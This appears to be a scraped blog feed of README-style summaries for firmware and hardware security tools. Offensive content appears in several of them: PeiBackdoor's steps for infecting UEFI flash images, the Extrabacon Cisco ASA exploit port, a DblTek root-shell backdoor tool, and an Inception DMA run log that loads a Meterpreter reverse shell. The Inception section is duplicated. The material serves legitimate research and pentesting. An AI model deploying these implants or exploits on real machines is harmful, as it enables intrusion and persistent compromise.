TROMMEL identifies the following indicators related to:
– Secure Shell (SSH) key files
– Secure Socket Layer (SSL) key files
– Internet Protocol (IP) addresses
– Uniform Resource Locator (URL)
– email addresses
– shell scripts
– web server binaries
– configuration files
– database files
– specific binaries files (i.e. Dropbear, BusyBox, etc.)
– shared object library files
– web application scripting variables, and
– Android application package (APK) file permissions.
TROMMEL has also integrated vFeed which allows for further in-depth vulnerability analysis of identified indicator.
trommel
Dependencies:
+ Python-Magic https://pypi.python.org/pypi/python-magic
+ vFeed Database Community(free Edition) https://vfeed.io/pricing/
The vFeed.db (The Correlated Vulnerability and Threat Database) is a detective and preventive security information repository used for gathering vulnerability and mitigation data from scattered internet sources into an unified database
Notes
* TROMMEL has been tested using Python 2.7 on macOS Sierra and Kali Linux x86_64.
* TROMMEL was written with the intent to help with identifying indicators that may contain vulnerabilities found in firmware of embedded devices
Usage:
git clone https://github.com/CERTCC-Vulnerability-Analysis/trommel && cd trommel ./trommel.py --help ./trommel.py -p /directory -o output_file]]>
Features:
+ UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
+ Intel PCH Flash Descriptors
+ Intel ME modules parsing (ME, TXE, etc)
+ Dell PFS (HDR) updates parsing
+ Tiano/EFI, and native LZMA (7z) [de]compression
+ Complete UEFI Firmware volume object hierarchy display
+ Firmware descriptor [re]generation using the parsed input volumes
+ Firmware File Section injection
The UEFI firmware parser v1.7
Supported Vendors
This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse, some may required a-priori decompression or extraction from the distribution update mechanism (typically a PE).
– ASRock
– Dell
– Gigabyte
– Intel
– Lenovo
– HP
– MSI
– VMware
– Apple
Requirements
– Python development headers, usually found in the python-dev package.
– The compression/decompression features will use the python headers and gcc.
– pefile is optional, and may be used for additional parsing.
Usage:
git clone https://github.com/theopolis/uefi-firmware-parser && cd uefi-firmware-parser pip install -r requirements.txt ./bin/uefi-firmware-parser -h ./bin/uefi-firmware-parser --test <your_image_firmware> python scripts/fv_injector.py -h python /scripts/uefi_guids.py -h Install with pypi: sudo pip install uefi_firmware sudo pip install uefi_firmware --upgrade (for upgrade)
Source: https://github.com/theopolis
]]>The Vulnerability
+ On March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek GoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named ‘dbladm’. When a user entered this as their username in a telnet prompt, the system would present a challenge that when followed with the right response, gave the user a root shell on the system.
+ The problem with such a challenge response system is that the devices are as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be aquired on ANY DblTek GoIP device.
DblTekGoIPPwn
Linux Dependencies:
+ Mono
Windows Dependencies:
+ Visual Studio
Usage:
git clone https://github.com/JacobMisirian/DblTekGoIPPwn && cd DblTekGoIPPwn ./install.sh DblTekGoIPPwn --help DblTekGoIPPwn --send-commands cmds.txt --file list.txt --output results.txt
Source: https://github.com/JacobMisirian
]]>The purpose of this project is to provide for simple, extensible, human-readable interfacing with wireless peripheral sniffing. By combing a suite of existing tools into a simple set of commands, this platform makes penetration testing and device reconnaisance compact.
Mithoren FrontEnd
Firmware and research tools for Nordic Semiconductor nRF24LU1+ based USB dongles and breakout boards.
Requirements
+ SDCC (minimum version 3.1.0)
+ GNU Binutils
+ Python
+ PyUSB
+ platformio
Supported Hardware
The following hardware has been tested and is known to work.
– CrazyRadio PA USB dongle
– SparkFun nRF24LU1+ breakout board
– Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)
Features:
+ Flash over USB
+ Flash a Logitech Unifying dongle
+ Flash a Logitech Unifying dongle back to the original firmware.
+ Flash over SPI using a Teensy
+ Flash the nRF24LU1+
Mithoren Tools
=Installation=
To utilize the full-system image:
* Flash image file under ‘image’ onto an SD-card or
For the standalone application:
* Copy ‘app’ into working directory
* Run ‘mithren.py’
Download and build from source base Debian/Ubuntu:
Install Dependencies: sudo apt-get install sdcc binutils python python-pip sudo pip install -U pip sudo pip install -U -I pyusb sudo pip install -U platformio git clone https://github.com/wolfmd/mith-ren && cd mith-ren cd modules/mousejack/ make To flash the firmware over USB: sudo make install To flash the firmware over USB onto a Logitech Unifying dongle: sudo make logitech_install To flash the Logitech firmware onto the dongle: sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex] Build and Upload the Teensy Flasher platformio run --project-dir teensy-flasher --target upload Flash the nRF24LU1+ sudo make spi_install For Tools Reconnaisance: cd tools and run one by one Finaly: cd .. cd app run python mithren-frontend.py python mithrend.py
Source: https://github.com/wolfmd
]]>Note:
* As of now, it is simply a script to automate Firmadyne which is a tool used for firmware emulation. In case of any issues with the actual emulation, please post your issues in the firmadyne issues.
* In case you are on Kali and are facing issues with emulation, it is recommended to use the AttifyOS Pre-Release VM downloadable from here, or alternatively you could do the above mentioned.
Firmware Analysis Toolkit
Firmware Analysis Toolkit is build on top of the following existing tools and projects :
1. Firmadyne
2. Binwalk
3. Firmware-Mod-Kit
4. MITMproxy
5. Firmwalker
Download and Setup instructions:
Install Binwalk: git clone https://github.com/devttys0/binwalk.git cd binwalk sudo ./deps.sh sudo python ./setup.py install sudo apt-get install python-lzma :: (for Python 2.x) sudo -H pip install git+https://github.com/ahupp/python-magic Setting up firmadyne: sudo apt-get install busybox-static fakeroot git kpartx netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp uml-utilities util-linux vlan qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils git clone --recursive https://github.com/firmadyne/firmadyne.git cd ./firmadyne; ./download.sh Edit firmadyne.config and make the FIRMWARE_DIR point to the current location of Firmadyne folder. Setting up FAT: git clone https://github.com/attify/firmware-analysis-toolkit mv firmware-analysis-toolkit/fat.py . mv firmware-analysis-toolkit/reset.sh . chmod +x fat.py chmod +x reset.sh vi fat.py Here, edit the line number 9 which is firmadyne_path = '/root/tools/firmadyne' to the correct path in your system. Setting up Firmware-mod-Kit: sudo apt-get install git build-essential zlib1g-dev liblzma-dev python-magic git clone https://github.com/brianpow/firmware-mod-kit.git Find the location of binwalk using which binwalk . Modify the file shared-ng.inc to change the value of variable BINWALK to the value of /usr/local/bin/binwalk (if that is where your binwalk is installed). . Setting up MITMProxy: pip install mitmproxy or apt-get install mitmproxy Setting up Firmwalker: git clone https://github.com/craigz28/firmwalker.git python fat.py
Source: https://github.com/attify
]]>(BIOS/UEFI), and the configuration of platform components. It includes a security test suite, security assessment
tools for various low level components/interfaces, and basic forensic capabilities for firmware.
CHIPSEC can run from Windows, Linux, Mac OS X and UEFI Shell.
What is Platform Security?
Hardware Implementation and Configuration
• Available Security Features
• Correct Configuration of HW Components
• Testing/Demonstration of HW Security Mechanisms
Firmware Implementation and Configuration
• Access Controls on Firmware Interfaces
• Correct Settings of Lock Bits
• Testing/Demonstration of FW Security Mechanisms
chipsec v1.2.5
feature:
+ System Management Mode
* CPU SMM Cache Poisoning / SMM Range Registers (SMRR)
* SMM memory (SMRAM) Lock
+ BIOS Write Protection
+ Direct HW Access for Manual Testing
+ Forensics
* Live system firmware analysis
* Offline system firmware analysis
Latest Change chipsec v1.2.5:
* More generic handling of chipsec_tools
* file extension fix
* Installing chipsec-manual.pdf
* change setup.py build driver by default. change root directory of chipsec. move WARNING.txt to chipsec. remove PKG-INFO
Tested on:
• Fedora LXDE 64bit
• Ubuntu 64bit
• Debian 64bit and 32bit
• Linux UEFI Validation (LUV)
Installing Manually on Linux & Mac OSX Platform:
Clone chipsec Git repository and install it as a package: git clone https://github.com/chipsec/chipsec python setup.py install sudo chipsec_main To use CHIPSEC in place without installing it: python setup.py build_ext -i sudo python chipsec_main.py Clone chipsec Git repository and install it as a package: # git clone https://github.com/chipsec/chipsec # python setup.py install # sudo chipsec_main To use CHIPSEC in place without installing it: # python setup.py build_ext -i # sudo python chipsec_main.py NOTE: Please read chipsec-manual.pdf For Detail installation and Configuration.
Source :https://github.com/chipsec
]]>on this repository has been adding patches for most versions of 8.x and 9.x in the near future after we test all versions on real hardware. There is improved shellcode, a LINA offset finder script, a Metasploit module, and extrabacon-2.0. This is using improved shellcode, has less stages than the Equation Group version making it more reliable. This makes the SNMP payload packet ~150 less bytes. Also, the leaked version only supports 8.x, we have it working on 9.x versions.
extrabacon v2
* Lina offset finder
– python2 ./lina-offsets.py asa_lina_XXX.elf
Will automatically generate necessary offsets to port the exploit to other versions of ASA.
Right now, it takes us longer to load a version of ASA firmware and test it, than it does to generate offsets for a specific version.
The only thing the script doesn’t calculate is FIX_EBP, which is usually 0x48 (72) or 0x58 (88). It seems like 8.4(1) and greater use 0x48.
Dependencies:
+ Metasploit Framework
+ Python 2.7.x
+ Python Scapy Modules
+ NASM
Use and Download:
sudo apt-get install nasm (makesure you have metasploit framework on your system) git clone https://github.com/RiskSense-Ops/CVE-2016-6366 && cd CVE-2016-6366 nasm shellcode.nasm (for execute shellcode) then now you can compile python2 lina-offsets.py Your_asa_lina_XXX.elf
Source: https://github.com/RiskSense-Ops
]]>
HEATHEN – Internet Of Things Pentesting Framework.
Main Menu:
* Insecure Web Interface
* Insufficient Authentication/Authorization
[-] Ensure that any access requiring authentication requires strong passwords
[-] Ensure that user roles can be properly segregated in multi-user environments
[-] Implement two-factor authentication where possible
[-] Ensure password recovery mechanisms are secure
[-] Ensure that users have the option to require strong passwords
[-] Ensure that users have the option to force password expiration after a specific period
[-] Ensure that users have the option to change the default username and password
* Insecure Network Services
* Lack of Transport Encryption
* Privacy Concerns
* Insecure Cloud Interface
* Insecure Mobile Interface
* Insufficient Security Configurability
* Insecure Software/Firmware
* Poor Physical Security
[-] Ensure the device is produced with a minimal number of physical external ports (e.g. USB ports)
[-] Ensure the firmware of Operating System can not be accessed via unintended methods such as through an unnecessary USB port
[-] Ensure the product is tamper resistant
[-] Ensure the product has the ability to limit administrative capabilities in some fashion, possibly by only connecting locally for admin functions
[-] Ensure the product has the ability to disable external ports such as USB
Usage and download:
git clone https://github.com/chihebchebbi/Internet-Of-Things-Pentesting-Framework.git heathen && cd heathen bash Heathen.sh
Source: https://github.com/chihebchebbi
]]>PEI backdoor project includes:
+ PeiBackdoor.py – Python program that allows to infect raw flash images or individual UEFI PEI drivers with the backdoor code.
+ PeiBackdoor_IA32.efi, PeiBackdoor_IA32.pdb – 32-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = IA32.
+ PeiBackdoor_X64.efi, PeiBackdoor_X64.pdb – 64-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = X64.
+ PeiBackdoor.inf – PEI backdoor project configuration for EDK2 build environment.
+ config.h – PEI backdoor build options.
+ payload.c – Put your own PEI stage code into this source file and call it from Payload() function.
+ src/ – Rest of the PEI backdoor code.
PeiBackdoor.py is using Capstone engine and pefile Python libraries, you need to install them with pip install capstone pefile command.
PeiBackdoor .py program to deploy PEI backdoor
Possible applied use cases:
* Edit values of REMAPBASE, REMAPLIMIT and other host controller registers during RAM initialization to perform UMA remap attack on Intel Management Engine RAM.
* Lock TSEGMB host controller register with the junk value to make System Management Mode code vulnerable to DMA attacks.
* Do other evil things that requires hijacking of early stage platform initialization code.
To build PeiBackdoor project you need to have a Windows machine with Visual Studio 2008 and EDK2 https://github.com/tianocore/edk2 source code.
Step by step instruction:
1. Run Visual Studio 2008 Command Prompt and cd to EDK2 directory.
2. Execute Edk2Setup.bat –pull command to configure build environment and download required binaries.
3. Execute git clone git://github.com/Cr4sh/PeiBackdoor.git command.
4. Edit Conf/target.txt file and set ACTIVE_PLATFORM property value to the OvmfPkg/OvmfPkgX64.dsc for 64-bit build or to the OvmfPkg/OvmfPkgIa32.dsc for 32-bit build. Also you need to set TARGET_ARCH property value to the X64 for 64-bit build or to the IA32 for 32-bit build.
5. Edit OvmfPkg/OvmfPkgX64.dsc and add PeiBackdoor/PeiBackdoor.inf path at the end of the [components] section.
6. cd PeiBackdoor && build
7. After compilation resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 64-bit build or at Build/OvmfX64/DEBUG_VS2008x86/IA32/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 32-bit build.
Running on real hardware
To run PeiBackdoor.efi on your physical machine you need to obtain image of existing PEI driver:
1. Dump motherboard firmware using hardware SPI programmer.
2. Open dumped flash image in UEFITool and extract PE/TE image of existing PEI driver that you want to infect with PEI backdoor:
pei-replace
..and itfect it using PeiBackdoor.py:
1. Infect extracted PE or TE image with SmmBackdoor_IA32.efi or SmmBackdoor_X64.efi depending on it’s architecture: python PeiBackdoor.py -d image.efi -o image_patched.efi -p PeiBackdoor_X64.efi
2.Use UEFITool to replace original PE image with image_patched.efi, save modified flash image into the file and write it to the motherboard ROM with programmer.
Usage and Download from git:
git clone https://github.com/Cr4sh/PeiBackdoor && cd PeiBackdoor python PeiBackdoor.py -f flash.bin -p PeiBackdoor_IA32.efi -o flash_patched.bin
Source: http://blog.cr4.sh/ | https://github.com/Cr4sh
]]>Roadmap & Changelog v0.4.1-git 29/6/2016:
+ Added some offsets for WIN7 Enterprise x64
Changelog 04/17/2015 v-0.4.1 Stable:
– Merged SLOTSCREAMER interface support
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.
How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
Caveats
OS X > 10.7.2 and Windows > 8.1 disables FireWire DMA when the user has locked the OS and thus prevents inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.
Requirements
Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
— libforensic1394
— msgpack
*) Caveats
- Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address >
0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys. - You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
- OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
- If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.
Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.
Installation
On Debian-based distributions the installation command lines can be summarized as:
sudo apt-get install git cmake g++ python3 python3-pip
On OS X, you can install the tool requirements with homebrew:
brew install git cmake python3
After installing the requirements, download and install libforensic1394:
git clone git://git.freddie.witherden.org/forensic1394.git cd forensic1394 cmake CMakeLists.txt sudo make install cd python sudo python3 setup.py install or wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz cd libforensic1394-0.2 cmake CMakeLists.txt make install cd python python3 setup.py install
Download and install Inception
git clone git://github.com/carmaa/inception.git cd inception ./setup.py install
The setup script should be able to install dependencies if you have pip installed.
General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:
incept [module name]
For a more complete and up-to-date description, run:
incept -h
Execution :
skygear$ incept implant --msfpw password --msfopts LHOST=36.16.1.1
_| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
_| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
_| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
_| _| _|_| _| _| _| _| _| _| _| _| _|_|
_| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|
v.0.4.1 (C) Carsten Maartmann-Moe 2016
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
x86. No other OSes, versions or architectures are supported, nor is there
any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================> ] 837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================> ] 534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!<strong style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;" data-mce-style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;"> </strong>For Source & More Detail read here : http://www.breaknenter.org/projects/inception/
Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.
Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)
Master.zip | Clone Url | Our Post Before
]]>– modified: exploits/auth_bypass.py
– modified: exploits/cmd_injection.py
– modified: exploits/csrf.py
– modified: iv-wrt.elf
iv-wrt is An intentionally vulnerable router firmware distribution based on OpenWrt.
Feature :
+ Authentication Bypass; Authentication bypass is turned off for the network disgnostics page.
+ Backdoor; A backdoor user account with root priveleges has been added.
+ Command Injection; It is possible to inject ash commands into the ping field which exists on <ip-address>/admin/network/diagnostics.
+ Reflected Cross-Site Scripting; On /cgi-bin/luci/;stok=<session-token>/admin/system/packages you can search for a package to determine whether or not it’s installed. Your search string is shown above the results. It is possible to inject scripting into this field.
+ Stored Cross-Site Scripting; It is possible to inject scripting into the hostname of the router. Since the hostname appears in the title of every page in the administration interface, this results in stored XSS for all pages.
+ Cross Site Request Forgery; While a user is logged in to the administration interface, a specially-crafted link from an outside source can cause actions to be executed on the administration interface. The system does not verify that the session token is correct.
Setup :
To start the image you will need qemu-system-mipsel and all of its dependencies. We recommend that you create a TAP device called tap0 and bridge it to your network interface. When the image boots, its LAN ip will be 10.0.0.1.
The driver for e1000 network cards have been built into the image. The following command will tell qemu to start the image using the interface tap0 and the e1000:
qemu-system-mipsel -kernel iv-wrt.elf -nographic -m 256 -net tap,ifname=tap0,script=no,downscript=no -net nic,model=e1000
Download : iv-wrt-master.zip(7.43 MB) | Our Post Before
Source : https://github.com/iv-wrt
Changelog 04/17/2015 v-0.4.1:
– Merged SLOTSCREAMER interface support
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.
How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
Caveats
OS X > 10.7.2 and Windows > 8.1 disables FireWire DMA when the user has locked the OS and thus prevents inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.
Requirements
Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
— libforensic1394
— msgpack
*) Caveats
- Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address >
0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys. - You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
- OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
- If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.
Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.
Installation
On Debian-based distributions the installation command lines can be summarized as:
sudo apt-get install git cmake g++ python3 python3-pip
On OS X, you can install the tool requirements with homebrew:
brew install git cmake python3
After installing the requirements, download and install libforensic1394:
git clone git://git.freddie.witherden.org/forensic1394.git cd forensic1394 cmake CMakeLists.txt sudo make install cd python sudo python3 setup.py install
Download and install Inception
git clone git://github.com/carmaa/inception.git cd inception ./setup.py install
The setup script should be able to install dependencies if you have pip installed.
General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:
incept [module name]
For a more complete and up-to-date description, run:
incept -h
Execution :
0x0mar$ incept implant --msfpw password --msfopts LHOST=36.16.1.1
_| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
_| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
_| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
_| _| _|_| _| _| _| _| _| _| _| _| _|_|
_| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|
v.0.4.1 (C) Carsten Maartmann-Moe 2015
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
x86. No other OSes, versions or architectures are supported, nor is there
any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================> ] 837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================> ] 534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!<strong style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;" data-mce-style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;"> </strong>For Source & More Detail read here : http://www.breaknenter.org/projects/inception/
Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.
Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)
Master.zip | Clone Url | Our Post Before
]]>